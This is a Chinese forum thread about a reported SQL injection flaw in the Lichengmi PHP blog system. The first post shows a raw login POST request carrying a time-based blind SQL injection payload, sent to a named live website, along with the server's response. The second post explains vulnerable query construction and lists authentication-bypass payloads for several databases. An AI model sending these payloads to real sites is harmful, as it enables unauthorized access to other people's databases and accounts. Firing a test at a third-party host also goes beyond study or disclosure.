里程密PHP博客系统存在SQL注入漏洞

技术文章
1

看到国家的CNNVD网站有一个标题《里程密PHP博客系统存在SQL注入漏洞

了
795×466 81 KB

来吧我们来测试一下!


POST /index.php?a=login&c=user&m=home HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://blog.fudong.top/
Cookie: PHPSESSID=jhide8evqsav9oh6u87hea9co5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 81
Host: blog.fudong.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive

password=g00dPa%24%24w0rD&username=0'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z```

回显

HTTP/1.1 200 OK
Server: JSP3/2.0.14
Date: Tue, 10 Nov 2020 08:24:27 GMT
Content-Type: application/json; charset=utf-8
Connection: keep-alive
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Accept-Ranges: bytes
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Timing-Allow-Origin: *
Ohc-File-Size: -1
Content-Length: 61

{"info":"\u767b\u9646\u5931\u8d25\uff01","status":0,"url":""}

就这多、到这就够了!

用工具扫描的报告!
里程密PHP.zip (31.5 KB)

2

以下服务器端伪代码用于对web应用程序的用户进行身份验证。
# Define POST variables uname = request.POST['username'] passwd = request.POST['password'] # SQL query vulnerable to SQLi sql = "SELECT id FROM users WHERE username='" + uname + "' AND password='" + passwd + "'" # Execute the SQL statement database.execute(sql)
这将导致对数据库服务器运行以下SQL查询。
SELECT id FROM users WHERE username='username' AND password='password**' OR 1=1'**
攻击者还可以注释掉SQL语句的其余部分,以进一步控制SQL查询的执行。

-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite ' OR '1'='1' -- ' OR '1'='1' /* -- MySQL ' OR '1'='1' # -- Access (using null characters) ' OR '1'='1' %00 ' OR '1'='1' %16

1 个赞